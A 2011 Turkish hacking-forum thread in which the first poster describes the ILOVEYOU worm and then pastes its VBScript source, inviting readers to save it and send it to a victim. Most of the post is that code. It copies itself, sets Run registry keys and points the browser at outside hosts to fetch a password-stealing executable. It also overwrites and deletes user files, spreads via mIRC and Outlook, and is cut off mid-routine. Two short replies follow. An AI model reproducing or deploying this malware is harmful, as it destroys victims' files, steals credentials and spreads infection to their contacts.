Yeni Sitemize Yönlendiriliyorsunuz !

Join the forum, it's quick and easy

Yeni Sitemize Yönlendiriliyorsunuz !

Would you like to react to this message? Create an account in a few clicks or log in to continue.

3 posters

    ÖLÜMCÜL ILoveYou Virüsü ve Kodları (MUTLAKA BAKIN)

    avatar
    Byy Sakmanizm


    Mesaj Sayısı : 1 Aldığı teşekkürler : 5 Nereden : Adana Kayıt Tarihi : 12/02/11

    ÖLÜMCÜL ILoveYou Virüsü ve Kodları (MUTLAKA BAKIN) Empty ÖLÜMCÜL ILoveYou Virüsü ve Kodları (MUTLAKA BAKIN)

    Mesaj tarafından Byy Sakmanizm C.tesi Şub. 19, 2011 7:46 pm

    Evet arkadaşlar sizlere dünyanın en tehlikeli 10
    virüsünden ILoveYou virüsü anlatacağım ve kullanmanız içinde kodlarını
    vereceğim.. (ARKADASLAR ÖNCELİKLE
    BELİRTEYİM PC YENİ TANIŞAN VE YA FAZLA BİLGİSİ OLMAYAN ARKADASLAR UZAK
    DURSUN YOKSA HİÇBİR MESULİYET KABUL ETMEM)


    En zararlı bilgisayar virüslerinden olan ILOVEYOU, kendini kopyalama yeteneği olan solucan türü bir virüstü.

    Etkisini gösterdiği dönemde 10 milyar dolara yakın zarara yol açan virüs, 2000 yılında Filipinler'den dünyaya yayıldı.



    Gizli bir hayran

    ILOVEYOU,
    e-posta yolu ile dağılıyordu. Kurbana gelen e-postanın konu bölümünde,
    "Gizli bir hayranından gelen aşk mektubu" ifadesi vardı.


    E-postanın ekinde bulunan "LOVE-LETTER-FOR-YOU.TXT.vbs" dosyası çalıştırıldığı takdirde şunlar oluyordu:


    • Virüs, kurbanın sabit diskinde birkaç klasör yaratıyor ve kendini gizli dosya olarak kopyalıyordu.
    • Windows registry'e bazı eklemeler yapıyordu.
    • Kendini e-postalara kopyalayarak kurbanın adres defterindeki kişilere gönderiyordu.
    • İnternetten
      WIN-BUGSFIX.EXE adında bir dosya indiriyordu. Bu programla kurbanın
      şifrelerini çalmak ve e-postalarındaki gizli bilgilere ulaşmak mümkün
      oluyordu.


    NOT: Virüsü oluşturan kişi yada kişilerin kim oldukları bulunamamıştır..

    Şimdi size kodları vereceğim bu kodları yeni bir metin belgesine
    kopyalayarak ister .bat uzantılı istersede html uzantılı olarak kaydedip
    kurbana gönderebilirsiniz.. (LÜTFEN MASUM İNSANLARDA DENEMEYİNİZ!)

    VE İŞTE KODLAR


    rem barok -loveletter(vbe)
    rem by: spyder / [Linkleri görebilmek için üye olun veya giriş yapın.] / @GRAMMERSoft Group / Manila,Philippines
    On Error Resume Next
    dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
    eq=""
    ctr=0
    Set fso = CreateObject("Scripting.FileSystemObject")
    set file = fso.OpenTextFile(WScript.ScriptFullname,1)
    vbscopy=file.ReadAll
    main()
    sub main()
    On Error Resume Next
    dim wscr,rr
    set wscr=CreateObject("WScript.Shell")
    rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
    if (rr>=1) then
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
    end if
    Set dirwin = fso.GetSpecialFolder(0)
    Set dirsystem = fso.GetSpecialFolder(1)
    Set dirtemp = fso.GetSpecialFolder(2)
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\MSKernel32.vbs")
    c.Copy(dirwin&"\Win32DLL.vbs")
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    regruns()
    html()
    spreadtoemail()
    listadriv()
    end sub
    sub regruns()
    On Error Resume Next
    Dim num,downread
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
    downread=""
    downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
    if (downread="") then
    downread="c:"
    end if
    if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
    Randomize
    num = Int((4 * Rnd) + 1)
    if num = 1 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
    Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf
    7679njbvYT/WIN-BUGSFIX.exe"
    elseif num = 2 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
    Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j
    nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
    elseif num = 3 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
    Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V
    bvg/WIN-BUGSFIX.exe"
    elseif num = 4 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
    Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras
    djhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy
    7thjg/WIN-BUGSFIX.exe"
    end if
    end if
    if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
    regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
    end if
    end sub
    sub listadriv
    On Error Resume Next
    Dim d,dc,s
    Set dc = fso.Drives
    For Each d in dc
    If d.DriveType = 2 or d.DriveType=3 Then
    folderlist(d.path&"")
    end if
    Next
    listadriv = s
    end sub
    sub infectfiles(folderspec)
    On Error Resume Next
    dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
    set f = fso.GetFolder(folderspec)
    set fc = f.Files
    for each f1 in fc
    ext=fso.GetExtensionName(f1.path)
    ext=lcase(ext)
    s=lcase(f1.name)
    if (ext="vbs") or (ext="vbe") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    bname=fso.GetBaseName(f1.path)
    set cop=fso.GetFile(f1.path)
    cop.copy(folderspec&""&bname&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="jpg") or (ext="jpeg") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    set cop=fso.GetFile(f1.path)
    cop.copy(f1.path&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="mp3") or (ext="mp2") then
    set mp3=fso.CreateTextFile(f1.path&".vbs")
    mp3.write vbscopy
    mp3.close
    set att=fso.GetFile(f1.path)
    att.attributes=att.attributes+2
    end if
    if (eq<>folderspec) then
    if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
    set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
    scriptini.WriteLine "[script]"
    scriptini.WriteLine ";mIRC Script"
    scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
    scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
    scriptini.WriteLine ";"
    scriptini.WriteLine ";Khaled Mardam-Bey"
    scriptini.WriteLine ";http://www.mirc.com"
    scriptini.WriteLine ";"
    scriptini.WriteLine "n0=on 1:JOIN:#:{"
    scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
    scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
    scriptini.WriteLine "n3=}"
    scriptini.close
    eq=folderspec
    end if
    end if
    next
    end sub
    sub folderlist(folderspec)
    On Error Resume Next
    dim f,f1,sf
    set f = fso.GetFolder(folderspec)
    set sf = f.SubFolders
    for each f1 in sf
    infectfiles(f1.path)
    folderlist(f1.path)
    next
    end sub
    sub regcreate(regkey,regvalue)
    Set regedit = CreateObject("WScript.Shell")
    regedit.RegWrite regkey,regvalue
    end sub
    function regget(value)
    Set regedit = CreateObject("WScript.Shell")
    regget=regedit.RegRead(value)
    end function
    function fileexist(filespec)
    On Error Resume Next
    dim msg
    if (fso.FileExists(filespec)) Then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    function folderexist(folderspec)
    On Error Resume Next
    dim msg
    if (fso.GetFolderExists(folderspec)) then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    sub spreadtoemail()
    On Error Resume Next
    dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
    set regedit=CreateObject("WScript.Shell")
    set out=WScript.CreateObject("Outlook.Application")
    set mapi=out.GetNameSpace("MAPI")
    for ctrlists=1 to mapi.AddressLists.Count
    set a=mapi.AddressLists(ctrlists)
    x=1
    regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB"&a)
    if (regv="") then
    regv=1
    end if__________________


    Tekrar söylüyorum bilmeyen lütfen uzak dursunlar
    bilgisayarınızın çok kötü bir şekilde çökmesini istemiyorsanız lütfen
    uzak durun!

    Bu Arada bi teşekkürüde çok görmeyin Wink
    BOZKURT
    BOZKURT


    Mesaj Sayısı : 343 Aldığı teşekkürler : 5574 Nereden : evden Kayıt Tarihi : 06/02/11

    ÖLÜMCÜL ILoveYou Virüsü ve Kodları (MUTLAKA BAKIN) Empty Geri: ÖLÜMCÜL ILoveYou Virüsü ve Kodları (MUTLAKA BAKIN)

    Mesaj tarafından BOZKURT Paz Şub. 20, 2011 10:58 pm

    teşekkürler
    HacKerByPaNter
    HacKerByPaNter


    Mesaj Sayısı : 195 Aldığı teşekkürler : 5450 Nereden : Olduğu Yerden. Kayıt Tarihi : 06/02/11

    ÖLÜMCÜL ILoveYou Virüsü ve Kodları (MUTLAKA BAKIN) Empty Geri: ÖLÜMCÜL ILoveYou Virüsü ve Kodları (MUTLAKA BAKIN)

    Mesaj tarafından HacKerByPaNter Cuma Nis. 22, 2011 3:52 pm

    Konu 2 kere açmışsın.

      Forum Saati Ptsi Mayıs 13, 2024 9:28 am